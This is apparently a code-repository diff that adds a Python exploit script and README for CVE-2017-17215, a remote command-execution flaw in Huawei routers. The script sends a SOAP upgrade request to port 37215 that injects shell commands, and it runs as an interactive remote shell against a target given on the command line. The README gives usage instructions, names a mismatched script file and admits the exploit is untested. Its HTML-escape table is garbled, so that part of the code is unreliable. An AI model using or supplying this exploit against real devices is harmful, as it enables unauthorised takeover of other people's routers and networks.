华为路由器RCE

CVE_EXP/CVE-2017-17215/CVE-2017-17215.py

@@ -0,0 +1,44 @@
+import requests
+import sys
+
+url_in = sys.argv[1]
+payload_url = url_in + "/ctrlt/DeviceUpgrade_1"
+payload_header = {'content-type': 'text/xml'}
+
+
+def payload_command (command_in):
+    html_escape_table = {
+        "&": "&",
+        '"': """,
+        "'": "'",
+        ">": ">",
+        "<": "&lt;",
+    }
+    command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
+    payload_1 = "<?xml version = \"1.0\" ?>" \
+                "   <s:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"http://appleworld.com/api/schema\">" \
+                "       <s:Body>"\
+                "           <u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">"\
+                "               <NewStatusURL> $("+command_filtered+" > /tmp/1337g) </NewStatusURL>"\
+                "               <NewDownloadURL> $(cat /tmp/1337g) </NewDownloadURL>"\
+                "           </u:Upgrade>"\
+                "       </s:Body>" \
+                "    </s:Envelope>"
+    return payload_1
+
+def do_post(command_in):
+    result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
+    print result.content
+
+
+
+
+print "***************************************************** \n" \
+       "****************   Coded By 1337g  ****************** \n" \
+       "*      CVE-2017-17215 Remote Command Execute EXP    * \n" \
+       "***************************************************** \n"
+
+while 1:
+    command_in = raw_input("Eneter your command here: ")
+    if command_in == "exit" : exit(0)
+    do_post(command_in)

CVE_EXP/CVE-2017-17215/README.md

@@ -0,0 +1,4 @@
+# CVE-2017-17215
+Usage: CVE-2017-12149.py http://targetip:37215/  
+I am so poor that cant afford to but a HUAWEI router XD so it is not tested on any machine~  
+but the exp technically should be working